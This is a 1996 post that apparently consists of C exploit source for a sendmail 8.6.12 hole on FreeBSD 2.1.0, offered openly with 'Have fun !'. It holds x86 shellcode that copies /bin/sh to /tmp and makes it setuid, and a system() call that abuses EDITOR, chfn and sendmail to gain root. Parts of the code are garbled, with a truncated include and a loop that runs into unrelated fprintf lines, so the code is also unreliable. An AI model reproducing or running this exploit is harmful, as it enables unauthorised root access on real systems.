Exploit for sendmail security hole (version 8.6.12 for FreeBSD Alexey Zakharov (leshka@chci.chuvashia.su) Mon, 23 Sep 1996 10:56:39 -0400 /* Hi ! */ /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0). */ /* If you have any problems with it, send letter to me. */ /* Have fun ! */ /* ----------------- Dedicated to my beautiful lady ------------------ */ /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su */ #include main() { void make_files(); make_files(); system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail; echo See result in /tmp"); } void make_files() { int i,j; FILE *f; char nop_string[200]; char code_string[]= { "\xeb\x50" /* jmp cont */ /* geteip: */ "\x5d" /* popl %ebp */ "\x55" /* pushl %ebp */ "\xff\x8d\xc3\xff\xff\xff" /* decl 0xffffffc 3(%ebp) */ "\xff\x8d\xd7\xff\xff\xff" /* decl 0xffffffd 7(%ebp) */ "\xc3" /* ret */ /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp" /* 0xffffffc3(%ebp): */ "\x3c" "chmod a=rsx /tmp/sh" /* 0xffffffd7(%ebp): */ "\x01" "-leshka-leshka-leshka-leshka-" /* reserved */ /* cont: */ "\xc7\xc4\x70\xcf\xbf\xef" /* movl $0xefbfcf7 0,%esp */ "\xe8\xa5\xff\xff\xff" /* call geteip */ "\x81\xc5\xb4\xff\xff\xff" /* addl $0xb4fffff f,%ebp */ "\x55" /* pushl %ebp */ "\x55" /* pushl %ebp */ "\x68\xd0\x77\x04\x08" /* pushl $0x80477d0 */ "\xc3" /* ret */ "-leshka-leshka-leshka-leshka-" /* reserved */ "\xa0\xcf\xbf\xef" }; j=269-sizeof(code_string); for(i=0;i\"$1\"\n"); fprintf(f,"touch -t 2510711313 \"$1\"\n"); fclose(f); }